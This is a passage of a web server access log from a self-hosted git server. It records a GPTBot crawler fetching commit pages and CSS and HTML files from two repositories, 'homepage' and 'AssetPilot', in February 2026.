+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/branch/main/.Backup/html/assets/css" -[17/Feb/2026:19:54:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2fhtml%2fassets%2fcss" [Client 74.7.227.38] [Length 25036] [Gzip 4.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/branch/main/.Backup/html/assets/css" -[17/Feb/2026:19:54:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/css" [Client 74.7.227.38] [Length 10111] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/css" -[17/Feb/2026:19:54:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/css/style.css" [Client 74.7.227.38] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/index.html" -[17/Feb/2026:19:54:55 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/static/css" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/static/css" -[17/Feb/2026:19:54:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/static/css" -[17/Feb/2026:19:54:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/css" [Client 74.7.227.38] [Length 10074] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets" -[17/Feb/2026:19:54:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/css/style.css" [Client 74.7.227.38] [Length 1060] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/index.html" -[17/Feb/2026:19:54:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/css/style.css" [Client 74.7.227.38] [Length 12663] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/css" -[17/Feb/2026:19:54:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/css" [Client 74.7.227.38] [Length 10098] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets" -[17/Feb/2026:19:54:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/css/style.css" [Client 74.7.227.38] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.html" -[17/Feb/2026:19:54:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/css/style.css" [Client 74.7.227.38] [Length 14686] [Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/css" -[17/Feb/2026:19:54:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/assets/css/style.css" [Client 74.7.227.38] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/branch/main/html/index.html" -[17/Feb/2026:19:55:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/css/style.css" [Client 74.7.227.38] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/index.html" -[17/Feb/2026:19:55:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/css/style.css" [Client 74.7.227.38] [Length 13118] [Gzip 3.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/css" -[17/Feb/2026:19:55:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/css" [Client 74.7.227.38] [Length 10111] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets" -[17/Feb/2026:19:55:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/css" [Client 74.7.227.38] [Length 10106] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets" -[17/Feb/2026:19:55:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/css" [Client 74.7.227.38] [Length 9854] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/css" -[17/Feb/2026:19:55:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/css/style.css" [Client 74.7.227.38] [Length 12659] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/css" -[17/Feb/2026:19:55:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/css" [Client 74.7.227.38] [Length 10108] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets" -[17/Feb/2026:19:55:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/css" [Client 74.7.227.38] [Length 10087] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/css" -[17/Feb/2026:19:55:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/static/css/style.css" [Client 74.7.227.38] [Length 31828] [Gzip 9.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/static/css" -[17/Feb/2026:19:55:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static/css" [Client 74.7.227.38] [Length 10103] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static" -[17/Feb/2026:19:55:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/static/css" [Client 74.7.227.38] [Length 10140] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/static" -[17/Feb/2026:19:55:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/static/css" [Client 74.7.227.38] [Length 10141] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/static" -[17/Feb/2026:19:55:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/css" [Client 74.7.227.38] [Length 10105] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets" -[17/Feb/2026:19:55:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/css" [Client 74.7.227.38] [Length 9869] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/css" -[17/Feb/2026:19:55:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/css" [Client 74.7.227.38] [Length 9868] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/css" -[17/Feb/2026:19:55:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/css" [Client 74.7.227.38] [Length 10106] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets" -[17/Feb/2026:19:55:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/css" [Client 74.7.227.38] [Length 10102] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets" -[17/Feb/2026:19:55:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/css" [Client 74.7.227.38] [Length 9870] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/css" -[17/Feb/2026:19:55:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/css/style.css" [Client 74.7.227.38] [Length 13338] [Gzip 3.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/css" -[17/Feb/2026:19:55:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/assets/css/style.css" [Client 74.7.227.38] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/branch/main/.Backup/html/index.html" -[17/Feb/2026:19:55:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static/css/style.css" [Client 74.7.227.38] [Length 31547] [Gzip 9.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static/css" -[17/Feb/2026:19:55:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/static/css/style.css" [Client 74.7.227.38] [Length 31597] [Gzip 9.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/static/css" -[17/Feb/2026:19:55:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/static/css/style.css" [Client 74.7.227.38] [Length 20082] [Gzip 7.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/static/css" -[17/Feb/2026:19:55:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/css" [Client 74.7.227.38] [Length 9867] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/css" -[17/Feb/2026:19:55:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/static/css" [Client 74.7.227.38] [Length 9934] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/static/css" -[17/Feb/2026:19:55:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static/css" [Client 74.7.227.38] [Length 10119] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static/css" -[17/Feb/2026:19:55:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/css" [Client 74.7.227.38] [Length 9869] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/css" -[17/Feb/2026:19:55:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/css" [Client 74.7.227.38] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/css" -[17/Feb/2026:19:55:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/static/css" [Client 74.7.227.38] [Length 10171] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/static/css" -[17/Feb/2026:19:55:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/css" [Client 74.7.227.38] [Length 10071] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets" -[17/Feb/2026:19:55:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/css/style.css" [Client 74.7.227.38] [Length 12661] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/css" -[17/Feb/2026:19:55:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/css/style.css" [Client 74.7.227.38] [Length 12629] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/css" -[17/Feb/2026:19:55:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/css/style.css" [Client 74.7.227.38] [Length 1060] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/index.html" -[17/Feb/2026:19:55:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/css" [Client 74.7.227.38] [Length 10105] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets" -[17/Feb/2026:19:55:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/css/style.css" [Client 74.7.227.38] [Length 13088] [Gzip 3.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/css" -[17/Feb/2026:19:55:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/css/style.css" [Client 74.7.227.38] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.html" -[17/Feb/2026:19:55:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/css/style.css" [Client 74.7.227.38] [Length 1060] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/index.html" -[17/Feb/2026:19:55:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/css/style.css" [Client 74.7.227.38] [Length 12659] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/css" -[17/Feb/2026:19:55:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/css/style.css" [Client 74.7.227.38] [Length 13117] [Gzip 3.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/css" -[17/Feb/2026:19:55:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/static/css" [Client 74.7.227.38] [Length 10112] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/static" -[17/Feb/2026:19:55:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/css" [Client 74.7.227.38] [Length 9839] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/css" -[17/Feb/2026:19:55:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/static/css" [Client 74.7.227.38] [Length 10144] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/static" -[17/Feb/2026:19:55:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/css" [Client 74.7.227.38] [Length 10102] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets" -[17/Feb/2026:19:55:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/css" [Client 74.7.227.38] [Length 10132] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 